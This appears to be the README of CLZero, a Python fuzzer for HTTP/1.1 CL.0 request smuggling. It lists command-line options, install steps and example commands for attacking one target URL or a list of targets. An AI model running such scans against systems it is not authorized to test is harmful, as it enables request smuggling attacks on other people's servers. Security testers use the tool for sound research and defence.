A project for fuzzing HTTP/1.1 CL.0 Request Smuggling Attack Vectors.

About

Thank you to @albinowax, @defparam and @d3d, without whom this tool would not exist. Inspired by the tool Smuggler; all attack gadgets were adapted from Smuggler and https://portswigger.net/research/how-to-turn-security-research-into-profit

For more info see: https://moopinger.github.io/blog/fuzzing/clzero/tools/request/smuggling/2023/11/15/Fuzzing-With-CLZero.html


Usage

usage: clzero.py [-h] [-url URL] [-file FILE] [-index INDEX] [-verbose] [-no-color] [-resume] [-skipread] [-quiet] [-lb] [-config CONFIG] [-method METHOD]

CLZero by Moopinger

optional arguments:
-h, --help show this help message and exit
-url URL (-u), Single target URL.
-file FILE (-f), Files containing multiple targets.
-index INDEX (-i), Index start point when using a file list. Default is first line.
-verbose (-v), Enable verbose output.
-no-color Disable colors in HTTP Status
-resume Resume scan from last index place.
-skipread Skip the read response on smuggle requests, recommended. This will save a lot of time between requests. Ideal for targets with standard HTTP traffic.
-quiet (-q), Disable output. Only successful payloads will be written to ./payloads/
-lb                   Last byte sync method for least request latency. Due to the nature of the request, it cannot guarantee that the smuggle request will be processed first. Ideal for targets with a high amount of traffic, and you do not mind sending multiple requests.
-config CONFIG (-c) Config file to load, see ./configs/ to create custom payloads
-method METHOD (-m) Method to use when sending the smuggle request. Default: POST

Single target attack:

  • python3 clzero.py -u https://www.target.com/ -c configs/default.py -skipread

  • python3 clzero.py -u https://www.target.com/ -c configs/default.py -lb

Multi target attack:

  • python3 clzero.py -f urls.txt -c configs/default.py -skipread

  • python3 clzero.py -f urls.txt -c configs/default.py -lb

Install

git clone https://github.com/Moopinger/CLZero.git
cd CLZero
pip3 install -r requirements.txt

